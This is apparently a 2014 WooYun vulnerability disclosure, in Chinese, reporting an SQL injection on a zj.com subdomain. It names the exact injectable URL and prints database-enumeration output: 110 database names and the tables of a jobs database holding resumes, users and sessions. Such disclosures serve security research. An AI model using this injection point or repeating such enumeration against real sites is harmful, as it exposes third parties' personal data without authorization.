当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053461

漏洞标题:浙江都市网分站注入得到全部数据库

相关厂商:浙江都市网

漏洞作者: →Hack涛

提交时间:2014-03-13 19:15

修复时间:2014-04-27 19:15

公开时间:2014-04-27 19:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-13: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-04-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

获取全部数据库!涉及数据量应该很大!二级域名几百个

详细说明:

1.jpg


注入点http://talk.zj.com/detail.cgi?id=175276

漏洞证明:

available databases [110]:
[*] 315old
[*] 9191_cn_domain
[*] 960520
[*] abc_zj_com
[*] ads_zj_com
[*] auto
[*] bbs2_zj_com
[*] bbs3_zj_com
[*] bbs_zj_com
[*] bless08
[*] blog_zj_com
[*] calendar
[*] comments_zj_com
[*] dt_news
[*] e
[*] ent
[*] ent20130103bak
[*] flash
[*] gaoxiao_zj_com
[*] ggg_zj_com
[*] ggg_zj_com2
[*] gggs_zj_com
[*] gps201203032147
[*] guess
[*] health
[*] hfa_jiankang_cn
[*] hope_zj_com
[*] images_zj_com
[*] information_schema
[*] jiajiao
[*] job
[*] joke
[*] jsbbsx15_201203032147
[*] jz_zj_com
[*] kc
[*] lady
[*] life
[*] life_zj_com
[*] liuxue
[*] lqsz
[*] machao
[*] mall
[*] mall_zj_com
[*] mba
[*] mmcs_zj_com
[*] mobile_number
[*] money_zj_com
[*] mysql
[*] netsun_cate
[*] netsun_forum
[*] netsun_jobs
[*] netsun_key
[*] netsun_Q
[*] netsun_trade
[*] new_blog_zj_com
[*] new_dz_zj_com
[*] nic
[*] nonghang
[*] oa_zj_com
[*] party
[*] party_new
[*] peixun_zj_com
[*] phpstat_zj_com
[*] pic_zj_com
[*] pinpai
[*] question
[*] session_tmps
[*] shangxing_from_dxjs
[*] share_zj_com
[*] shouji
[*] site_zj_com
[*] stat_zj_com
[*] talk
[*] tempuc201203032147
[*] test
[*] test_bbs_zj_com
[*] test_bbs_zl_com_bak
[*] testtest
[*] tianyumuju
[*] tour
[*] tour_zj_com
[*] tuku
[*] tupian_zj_com
[*] ublog_zj_com
[*] ucenter_test
[*] vote
[*] votephp
[*] votes
[*] votes_zj_com
[*] weather
[*] weather_yahoo
[*] xinhua
[*] xinli
[*] xl
[*] xl_zj_com
[*] xtly_zj_com
[*] xun_zj_com
[*] yls1
[*] youth_foundation
[*] yuesao_zj_com
[*] zg
[*] zj_forum
[*] zj_ted
[*] zjhq_hub_zj_com
[*] zjhq_zj_com
[*] zjsq
[*] zsol_zj_com
[*] zt
[*] zt_zj_com
[*] zufang
随便找了个数据库测试了一下
Database: job
[45 tables]
+---------------------+
| cmt |
| dy_articles |
| dy_words |
| game_articles |
| game_words |
| games_articles |
| games_words |
| job_apply |
| job_block |
| job_blocks |
| job_company_base |
| job_company_depart |
| job_company_hr |
| job_company_job |
| job_company_jobmod |
| job_company_manager |
| job_interview |
| job_mailmb |
| job_news |
| job_otherjob |
| job_person_base |
| job_person_favorite |
| job_resume_base |
| job_resume_edu |
| job_resume_exp |
| job_resume_honor |
| job_resume_lang |
| job_resume_other |
| job_resume_proj |
| job_resume_train |
| job_sessions |
| job_upfile |
| job_users |
| product_cn |
| product_cn_bak |
| tb_articles |
| tb_words |
| y_s_articles |
| y_s_words |
| ying_articles |
| ying_words |
| ys_articles |
| ys_words |
| yx_articles |
| yx_words |
+---------------------+

修复方案:

防注入啊!

版权声明:转载请注明来源 →Hack涛@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝